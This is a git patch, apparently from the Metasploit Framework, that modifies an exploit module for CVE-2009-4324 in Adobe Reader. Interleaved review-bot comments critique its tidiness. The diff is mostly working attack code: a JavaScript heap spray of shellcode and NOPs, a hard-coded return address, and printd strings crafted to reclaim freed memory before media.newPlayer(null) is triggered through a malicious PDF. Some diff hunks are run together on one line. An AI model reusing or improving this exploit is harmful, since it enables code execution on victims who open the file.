From 0fa275b53b86b31b3a43435e3dbcb883d4033cd7 Mon Sep 17 00:00:00 2001
From: pusscat <>
Date: Wed, 16 Dec 2009 21:44:18 +0000
Subject: [PATCH] Cleanups Allow arbitrary (non-unicode) targets
git-svn-id: file:///home/svn/framework3/trunk@7895 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../fileformat/adobe_media_newplayer.rb | 25 ++++++++++++-------
 1 file changed, 16 insertions(+), 9 deletions(-)
diff --git a/modules/exploits/windows/fileformat/adobe_media_newplayer.rb b/modules/exploits/windows/fileformat/adobe_media_newplayer.rb
index 9a23c4f88e..82b9abbbfb 100644
--- a/modules/exploits/windows/fileformat/adobe_media_newplayer.rb
+++ b/modules/exploits/windows/fileformat/adobe_media_newplayer.rb
@@ -33,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote
 'References' =>
 [
 [ 'CVE', '2009-4324' ],
- [ 'BID', '37331' ],
 [ 'OSVDB', '60980' ]
 ],
 'DefaultOptions' =>
@@ -50,14 +49,12 @@ class Metasploit3 < Msf::Exploit::Remote
 'Targets' =>
 [
 # test results (on Windows XP SP3)
- # reader 6.0.1 - vulnerable / doesn't work
 # reader 7.0.5 - untested
 # reader 7.0.8 - untested
- # reader 7.0.9 - vulnerable / doesn't work
+ # reader 7.0.9 - untested
 # reader 7.1.0 - untested
 # reader 7.1.1 - untested
 # reader 8.0.0 - untested
- # reader 8.1.1 - works
 # reader 8.1.2 - untested
 # reader 8.1.3 - untested
 # reader 8.1.4 - untested
@@ -66,9 +63,10 @@ class Metasploit3 < Msf::Exploit::Remote
 # reader 9.0.0 - untested
 # reader 9.1.0 - works
 # reader 9.2 - works (no debugger, no DEP)
- [ 'Adobe Reader Windows Universal (JS Heap Spray)',
+ [ 'Adobe Reader Windows English (JS Heap Spray)',
 {
- 'Size' => (0x10000/2)
+ 'Size' => (0x10000/2),
+ 'Ret' => 0x002e0031
 }
 ],
 ],
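Review bot: The `[ 'BID', '37331' ]` reference is dropped with no reason given in the commit message, leaving only the CVE and OSVDB ids; BID numbers are what several advisory and vulnerability-management feeds key on, so removing a valid one makes the module harder to correlate with external tracking. If it was removed because the id was wrong or duplicated, say so in the commit message; otherwise keep the line. Whether the BID id itself is correct cannot be checked from this page.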
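Review bot: The target's rename from 'Universal' to 'English' and the new `'Ret' => 0x002e0031` entry are not reflected in the 'test results' comment block directly above it, which still lists reader 9.1.0 / 9.2 as 'works' without saying which build locale those results were obtained on, and the commit message ('Allow arbitrary (non-unicode) targets') describes a broader change than a single locale-specific target. A comment such as `# test results (on Windows XP SP3, English builds)` or a one-line note on the `'Ret'` entry about what it is tied to would keep the three consistent. Whether the 9.x results predate or follow the new target is not recoverable from this hunk.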
@@ -91,12 +89,21 @@ class Metasploit3 < Msf::Exploit::Remote nops = Rex::Text.to_unescape(make_nops(4)) # Randomize variables + # + len = 72 rand1 = rand_text_alpha(rand(100) + 1) rand2 = rand_text_alpha(rand(100) + 1) + rand3 = rand_text_alpha(rand(100) + 1) + rand4 = rand_text_alpha(len/2) + rand5 = rand_text_alpha(len/2) + + retstring = Rex::Text.to_unescape([target.ret].pack('V') + rand_text_alpha(len-4)) + # The printd strings are 72 bytes (??) script = %Q| var #{rand1} = unescape("#{shellcode}"); var #{rand2} = unescape("#{nops}"); +var #{rand3} = unescape("#{retstring}"); while(#{rand2}.length <= #{target['Size']}) #{rand2}+=#{rand2}; #{rand2}=#{rand2}.substring(0,#{target['Size']} - #{rand1}.length); @@ -107,10 +114,10 @@ for(i=0;i<0x2000;i++) { memory[i]= #{rand2} + #{rand1}; } -util.printd("1.345678901.345678901.3456 : 1.31.34", new Date()); -util.printd("1.345678901.345678901.3456 : 1.31.34", new Date()); +util.printd("#{rand4}", new Date()); +util.printd("#{rand5}", new Date()); try {this.media.newPlayer(null);} catch(e) {} -util.printd("1.345678901.345678901.3456 : 1.31.34", new Date()); +util.printd(#{rand3}, new Date()); | # Create the pdf
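Review bot: The new comment `# The printd strings are 72 bytes (??)` records a guess, and `len = 72` is then used in three places (`len/2` for `rand4` and `rand5`, `len-4` for the padding appended in `retstring`), so a reader cannot tell whether the `(??)` applies to the number or to the whole layout; the method this hunk sits in starts and ends outside the hunk. Resolve the uncertainty before merging — either state where 72 comes from or reword the comment to say it is unverified — and drop the stray empty `#` line added after `# Randomize variables`. It is also worth a one-line comment that `util.printd(#{rand3}, new Date())` intentionally passes the JavaScript variable unquoted, unlike the quoted `#{rand4}` and `#{rand5}` calls, since it reads like a typo at first glance.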